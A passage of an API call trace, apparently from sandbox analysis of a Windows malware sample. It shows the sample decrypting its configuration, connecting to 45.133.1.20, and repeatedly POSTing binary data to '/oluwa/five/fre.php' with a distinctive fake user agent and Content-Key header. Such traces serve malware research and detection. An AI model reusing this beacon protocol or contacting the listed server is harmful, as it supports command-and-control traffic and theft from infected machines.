CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0161.101] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.101] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0161.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.102] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0161.102] GetProcessHeap () returned 0x6a0000 [0161.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.103] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0161.104] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.104] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0161.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.105] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0161.106] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.106] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0161.106] GetProcessHeap () returned 0x6a0000 [0161.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0161.106] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0161.107] GetProcessHeap () returned 0x6a0000 [0161.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0161.107] GetProcessHeap () returned 0x6a0000 [0161.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0161.108] GetProcessHeap () returned 0x6a0000 [0161.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0161.108] GetProcessHeap () returned 0x6a0000 [0161.108] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0161.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.109] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.126] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0161.140] GetProcessHeap () returned 0x6a0000 [0161.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0161.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.142] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0161.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.143] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.143] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.143] GetProcessHeap () returned 0x6a0000 [0161.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0161.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.145] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0161.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.146] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0161.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.148] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0161.148] GetProcessHeap () returned 0x6a0000 [0161.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.149] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0161.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.150] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0161.151] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.151] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0161.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.152] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0161.152] GetProcessHeap () returned 0x6a0000 [0161.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0161.152] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0161.152] GetProcessHeap () returned 0x6a0000 [0161.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0161.152] socket (af=2, type=1, protocol=6) returned 0x2b4 [0161.153] connect (s=0x2b4, name=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0161.179] FreeAddrInfoW (pAddrInfo=0x6b9a50*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0161.179] GetProcessHeap () returned 0x6a0000 [0161.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0161.179] GetProcessHeap () returned 0x6a0000 [0161.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0161.180] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.181] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0161.181] GetProcessHeap () returned 0x6a0000 [0161.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0161.181] GetProcessHeap () returned 0x6a0000 [0161.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.182] GetProcessHeap () returned 0x6a0000 [0161.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0161.182] GetProcessHeap () returned 0x6a0000 [0161.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0161.183] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.184] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0161.184] GetProcessHeap () returned 0x6a0000 [0161.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0161.184] GetProcessHeap () returned 0x6a0000 [0161.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.184] send (s=0x2b4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0161.185] send (s=0x2b4, buf=0x6bb998*, len=159, flags=0) returned 159 [0161.185] GetProcessHeap () returned 0x6a0000 [0161.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0161.185] recv (in: s=0x2b4, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0161.258] GetProcessHeap () returned 0x6a0000 [0161.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0161.259] GetProcessHeap () returned 0x6a0000 [0161.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0161.260] GetProcessHeap () returned 0x6a0000 [0161.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0161.261] GetProcessHeap () returned 0x6a0000 [0161.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0161.261] closesocket (s=0x2b4) returned 0 [0161.262] GetProcessHeap () returned 0x6a0000 [0161.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0161.262] GetProcessHeap () returned 0x6a0000 [0161.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0161.263] GetProcessHeap () returned 0x6a0000 [0161.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0161.264] GetProcessHeap () returned 0x6a0000 [0161.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0161.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x3b8) returned 0x2b4 [0161.269] Sleep (dwMilliseconds=0xea60) [0161.270] GetProcessHeap () returned 0x6a0000 [0161.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0161.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.272] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0161.289] GetProcessHeap () returned 0x6a0000 [0161.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0161.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.291] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0161.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.292] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.293] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.293] GetProcessHeap () returned 0x6a0000 [0161.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0161.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.295] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0161.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.352] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0161.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.354] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0161.360] GetProcessHeap () returned 0x6a0000 [0161.360] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.363] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0161.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.364] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0161.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.365] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0161.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.366] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0161.367] GetProcessHeap () returned 0x6a0000 [0161.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0161.367] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0161.368] GetProcessHeap () returned 0x6a0000 [0161.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0161.368] GetProcessHeap () returned 0x6a0000 [0161.368] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0161.368] GetProcessHeap () returned 0x6a0000 [0161.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0161.369] GetProcessHeap () returned 0x6a0000 [0161.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0161.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.370] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0161.391] GetProcessHeap () returned 0x6a0000 [0161.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0161.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.392] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0161.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.393] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.396] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.396] GetProcessHeap () returned 0x6a0000 [0161.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0161.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.398] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0161.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.399] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0161.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.400] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0161.400] GetProcessHeap () returned 0x6a0000 [0161.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.402] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0161.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.403] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0161.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.404] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0161.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.405] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0161.405] GetProcessHeap () returned 0x6a0000 [0161.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0161.405] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0161.405] GetProcessHeap () returned 0x6a0000 [0161.405] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa40 [0161.405] socket (af=2, type=1, protocol=6) returned 0x2b8 [0161.407] connect (s=0x2b8, name=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0161.434] FreeAddrInfoW (pAddrInfo=0x6b9b18*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea60*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0161.434] GetProcessHeap () returned 0x6a0000 [0161.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0161.435] GetProcessHeap () returned 0x6a0000 [0161.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0161.436] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.437] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0161.437] GetProcessHeap () returned 0x6a0000 [0161.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0161.437] GetProcessHeap () returned 0x6a0000 [0161.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.437] GetProcessHeap () returned 0x6a0000 [0161.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0161.438] GetProcessHeap () returned 0x6a0000 [0161.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0161.438] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0161.441] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0161.441] GetProcessHeap () returned 0x6a0000 [0161.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0161.441] GetProcessHeap () returned 0x6a0000 [0161.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0161.442] send (s=0x2b8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0161.442] send (s=0x2b8, buf=0x6bb998*, len=159, flags=0) returned 159 [0161.442] GetProcessHeap () returned 0x6a0000 [0161.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6bf370 [0161.443] recv (in: s=0x2b8, buf=0x6bf370, len=4048, flags=0 | out: buf=0x6bf370*) returned 204 [0161.578] GetProcessHeap () returned 0x6a0000 [0161.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0161.578] GetProcessHeap () returned 0x6a0000 [0161.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0161.579] GetProcessHeap () returned 0x6a0000 [0161.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0161.579] GetProcessHeap () returned 0x6a0000 [0161.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0161.579] closesocket (s=0x2b8) returned 0 [0161.581] GetProcessHeap () returned 0x6a0000 [0161.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0161.581] GetProcessHeap () returned 0x6a0000 [0161.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0161.582] GetProcessHeap () returned 0x6a0000 [0161.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0161.583] GetProcessHeap () returned 0x6a0000 [0161.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0161.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6bf370, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1340) returned 0x2b8 [0161.600] Sleep (dwMilliseconds=0xea60) [0161.601] GetProcessHeap () returned 0x6a0000 [0161.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0161.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.602] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0161.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0161.617] GetProcessHeap () returned 0x6a0000 [0161.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0161.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.618] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0161.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.622] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0161.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.623] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0161.623] GetProcessHeap () returned 0x6a0000 [0161.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0161.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.625] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0161.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.626] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0161.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0161.628] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0161.628] GetProcessHeap () returned 0x6a0000 [0161.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0161.629] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.629] StrStrA 